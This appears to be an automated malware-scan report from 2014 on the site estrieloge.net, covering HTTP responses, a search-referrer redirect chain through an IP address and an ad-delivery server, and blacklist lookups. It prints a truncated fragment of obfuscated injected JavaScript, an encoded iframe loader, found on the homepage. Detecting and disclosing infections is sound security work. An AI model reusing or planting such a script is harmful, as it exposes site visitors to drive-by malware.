Scanned pages/files
| Request | Server response | Status |
http://estrieloge.net/ | 200 OK Content-Length: 5669 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,153,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,153,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21,16,44,1 Antivirus reports:
| ||
http://estrieloge.net/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://estrieloge.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: estrieloge.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 23:28:32 GMT Location: http://212.227.7.91/easydox/count.php Server: Apache Content-Length: 245 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://212.227.7.91/easydox/count.php (imitation of visitor from search engine) GET /easydox/count.php HTTP/1.1 Host: 212.227.7.91 Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Sep 2014 23:28:31 GMT Location: http://zhucova.automotiveeventregistration.com/openx/www/delivery/spc.php?zones=WP-Home-Floating-Testing%3D1365%7CWP-Home-Leaderboard%3D209%7CWP-Home-ButtonGateway%3D1497%7CWP-Home-TopBanner%3D210%7CWP-Home-TopRight1%3D230%7CWP-Home-TopRight2%3D213%7CWP-Home-TopRight3%3D578%7CWP-Home-TopRight4%3D2067%7CWP-Home-CenterRight%3D214%7CWP-Home-DownRight%3D217%7CWP-Home-Center1%3D215%7CWP-Home-Center2%3D225%7CWP-Home-BottomBanner%3D2061%7CWP-Home-TopSide%3D208%7CWP-Home-DownSide%3D602%7CWP-LALightSuplement%3D2346%7CWP-Gateway-MissIndo%3D2347%7Cokezone.com%20-%20Leaderboard-expand%3D2461%7CWP-Home-SkinLeft%3D2607%7CWP-Home-SkinRight%3D2608%7CWP-Home-ButtonGateway2%3D2628%7CWP-Home-Slide1%3D2636%7CWP-Home-Slide2%3D2637%7CWP-Home-Slide3%3D2638%7CWP-Home-Slide4%3D2639%7CWP-Home-Slide5%3D2640%7CWP-Home-Slide6%3D2641%7CWP-Home-Slide7%3D2642%7CWP-Home-Slide8%3D2643%7CWP-Home-Slide9%3D2644%7CWP-Home-Slide10%3D2645%7CWP-Home-Slide11%3D2647%7CWP-Home-Slide12%3D2648%7CWP-Home-Slide13%3D2649%7CWP-Home-Slide14%3D2650%7CWP-articke-corner%3D2651%7CWP-Home-TopSlide%3D2652%7CWP-Home-Sliding1%3D2653%7CWP-Home-Sliding2%3D2654%7CWP-Home-Sliding3%3D2655%7CWP-Home-Sliding4%3D2656%7CWP-Home-Sliding5%3D2657%7CWP-Home-Sliding6%3D2658%7CWP-Home-Sliding7%3D2659%7CWP-Home-Sliding8%3D2660%7CWP-Home-Sliding9%3D2661%7CWP-Home-Sliding10%3D2662%7C&nz=1&source=&r=42459140&charset=UTF-8&loc=http%3A%2F%2F212.227.7.91%2F Server: Apache Content-Length: 1604 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: PwM=31; path=/; domain=212.227.7.91; expires=Tue, 07-Oct-2014 08:30:31 GMT | suspicious |
URL: http://zhucova.automotiveeventregistration.com/openx/www/delivery/spc.php?zones=WP-Home-Floating-Testing%3D1365%7CWP-Home-Leaderboard%3D209%7CWP-Home-ButtonGateway%3D1497%7CWP-Home-TopBanner%3D210%7CWP-Home-TopRight1%3D230%7CWP-Home-TopRight2%3D213%7CWP-Home-TopRight3%3D578%7CWP-Home-TopRight4%3D2067%7CWP-Home-CenterRight%3D214%7CWP-Home-DownRight%3D217%7CWP-Home-Center1%3D215%7CWP-Home-Center2%3D225%7CWP-Home-BottomBanner%3D2061%7CWP-Home-TopSide%3D208%7CWP-Home-DownSide%3D602%7CWP-LALightSuplement%3D2346%7CWP-Gateway-MissIndo%3D2347%7Cokezone.com%20-%20Leaderboard-expand%3D2461%7CWP-Home-SkinLeft%3D2607%7CWP-Home-SkinRight%3D2608%7CWP-Home-ButtonGateway2%3D2628%7CWP-Home-Slide1%3D2636%7CWP-Home-Slide2%3D2637%7CWP-Home-Slide3%3D2638%7CWP-Home-Slide4%3D2639%7CWP-Home-Slide5%3D2640%7CWP-Home-Slide6%3D2641%7CWP-Home-Slide7%3D2642%7CWP-Home-Slide8%3D2643%7CWP-Home-Slide9%3D2644%7CWP-Home-Slide10%3D2645%7CWP-Home-Slide11%3D2647%7CWP-Home-Slide12%3D2648%7CWP-Home-Slide13%3D2649%7CWP-Home-Slide14%3D2650%7CWP-articke-corner%3D2651%7CWP-Home-TopSlide%3D2652%7CWP-Home-Sliding1%3D2653%7CWP-Home-Sliding2%3D2654%7CWP-Home-Sliding3%3D2655%7CWP-Home-Sliding4%3D2656%7CWP-Home-Sliding5%3D2657%7CWP-Home-Sliding6%3D2658%7CWP-Home-Sliding7%3D2659%7CWP-Home-Sliding8%3D2660%7CWP-Home-Sliding9%3D2661%7CWP-Home-Sliding10%3D2662%7C&nz=1&source=&r=42459140&charset=UTF-8&loc=http%3A%2F%2F212.227.7.91%2F (imitation of visitor from search engine) GET /openx/www/delivery/spc.php?zones=WP-Home-Floating-Testing%3D1365%7CWP-Home-Leaderboard%3D209%7CWP-Home-ButtonGateway%3D1497%7CWP-Home-TopBanner%3D210%7CWP-Home-TopRight1%3D230%7CWP-Home-TopRight2%3D213%7CWP-Home-TopRight3%3D578%7CWP-Home-TopRight4%3D2067%7CWP-Home-CenterRight%3D214%7CWP-Home-DownRight%3D217%7CWP-Home-Center1%3D215%7CWP-Home-Center2%3D225%7CWP-Home-BottomBanner%3D2061%7CWP-Home-TopSide%3D208%7CWP-Home-DownSide%3D602%7CWP-LALightSuplement%3D2346%7CWP-Gateway-MissIndo%3D2347%7Cokezone.com%20-%20Leaderboard-expand%3D2461%7CWP-Home-SkinLeft%3D2607%7CWP-Home-SkinRight%3D2608%7CWP-Home-ButtonGateway2%3D2628%7CWP-Home-Slide1%3D2636%7CWP-Home-Slide2%3D2637%7CWP-Home-Slide3%3D2638%7CWP-Home-Slide4%3D2639%7CWP-Home-Slide5%3D2640%7CWP-Home-Slide6%3D2641%7CWP-Home-Slide7%3D2642%7CWP-Home-Slide8%3D2643%7CWP-Home-Slide9%3D2644%7CWP-Home-Slide10%3D2645%7CWP-Home-Slide11%3D2647%7CWP-Home-Slide12%3D2648%7CWP-Home-Slide13%3D2649%7CWP-Home-Slide14%3D2650%7CWP-articke-corner%3D2651%7CWP-Home-TopSlide%3D2652%7CWP-Home-Sliding1%3D2653%7CWP-Home-Sliding2%3D2654%7CWP-Home-Sliding3%3D2655%7CWP-Home-Sliding4%3D2656%7CWP-Home-Sliding5%3D2657%7CWP-Home-Sliding6%3D2658%7CWP-Home-Sliding7%3D2659%7CWP-Home-Sliding8%3D2660%7CWP-Home-Sliding9%3D2661%7CWP-Home-Sliding10%3D2662%7C&nz=1&source=&r=42459140&charset=UTF-8&loc=http%3A%2F%2F212.227.7.91%2F HTTP/1.1 Host: zhucova.automotiveeventregistration.com Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 29 Sep 2014 23:28:32 GMT Location: http://www.google.com/ Server: nginx/1.1.4 Content-Length: 160 Content-Type: text/html | suspicious |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=estrieloge.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://estrieloge.net/
Result: estrieloge.net is not infected or malware details are not published yet.
Result: estrieloge.net is not infected or malware details are not published yet.